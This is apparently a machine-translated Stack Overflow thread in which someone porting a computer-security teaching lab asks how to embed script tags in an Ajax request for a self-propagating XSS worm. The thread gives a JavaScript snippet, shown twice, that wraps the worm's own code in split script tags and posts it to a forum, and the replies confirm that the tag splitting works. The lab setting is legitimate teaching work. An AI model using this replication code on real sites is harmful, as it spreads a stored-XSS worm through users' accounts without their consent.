Javascript 在ajax内容中发送标记

我正在移植这个实验室：

为了一个项目。然而，首先，我必须能够自己完成它。我正试图找出自我传播的蠕虫，但遇到了一些困难。如何通过内容发送脚本标记？如果我尝试：

标记从它所在的较大javascript中分离出来。我还尝试将其拆分为：

...+"</scr"+"ipt>&...

但这并不奏效

有什么建议吗

编辑：更新了我最近和我希望，准确的尝试

var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);

---

您没有逃逸脚本标记。

将结束脚本标记拆分为两个不同的部分最终还是可以工作的。我认为我遇到的问题是特定于浏览器的。

谢谢你这么笨。我的任务不是做这个实验，而是将它移植到我们的实验室环境中，以便下一年上课。这门课实际上没有教我如何做。@lbu我正在移植这个实验室：它说它的作业在哪里？计算机安全教育实验室你需要提交一份详细的实验室报告来描述你所做的和你所观察到的。请使用LiveHTTPHeaders、Wireshark和/或屏幕截图提供详细信息。你还需要对有趣或令人惊讶的观察结果进行解释。Ibu，在你放弃之前，请阅读整篇文章。我在第一句话中说，我要把这个实验室移植到未来的课堂上。如果我理解正确的话，你所列出的尝试，把它分成两个串联的字符串，应该可以。你是说它仍然把它看作是一个结束脚本标签？

var wormCode = getElementById("worm");
var escapedWorm = escape("<" + "script>" + wormCode.innerHTML + "</" + "script>");
content="topicTitle=testprop&forum=3&action=ptopic&postText="+escapedWorm;
Ajax.send(content);